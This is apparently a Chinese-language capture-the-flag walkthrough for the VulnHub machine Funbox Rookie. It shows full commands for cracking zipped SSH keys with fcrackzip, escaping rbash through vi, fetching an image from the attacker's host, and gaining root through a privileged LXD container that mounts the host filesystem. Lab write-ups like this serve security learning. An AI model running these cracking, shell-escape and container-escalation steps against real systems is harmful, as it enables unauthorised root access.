靶机描述
Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first.
This VM is created/tested with Virtualbox. Maybe it works with vmware.
If you need hints, call me on twitter: @0815R2d2
Have fun...
This works better with VirtualBox, rather than VMware
下载 https://www.vulnhub.com/entry/funbox-rookie,520/
清单
-
信息搜集
- netdiscover
- fcrackzip
-
提权
-
lxd
信息搜集
靶机IP
端口扫描
nmap -A 192.168.34.172
21/tcp open ftp ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 anna.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 ariel.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:52 bud.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:58 cathrine.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 homer.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 jessica.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 john.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 marge.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:50 miriam.zip
| -r--r--r-- 1 ftp ftp 1477 Jul 25 10:44 tom.zip
| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 10:51 zlatan.zip
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
| 256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_ 256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/logs/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
开放 21、22、80
21
很多文件
80
apache默认页面
21
将ftp文件下载下来
压缩为加密的
内容为 id_rsa
fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt cathrine.zip
得到压缩包密码
Tom 用户
连接到 tom 用户
漏洞利用
现在以及发现漏洞所在 [^1]
切换至 /tmp 时
返回 rbash
绕过
vi
:set shell=/bin/bash
:shell
现在已经可以切换了
Kali
使用 python 将文件传输过去
靶机
切换至 /tmp
wget http://192.168.34.160:8000/alpine-v3.12-x86_64-20200804_1103.tar.gz
// 下载
lxc image import alpine-v3.12-x86_64-20200804_1103.tar.gz --alias y2my
// 导入
lxd init
//初始化
lxc init y2my privesc -c security.privileged=true
lxc config device add privesc y2my disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
依次输入
获取root
得到flag 文件内容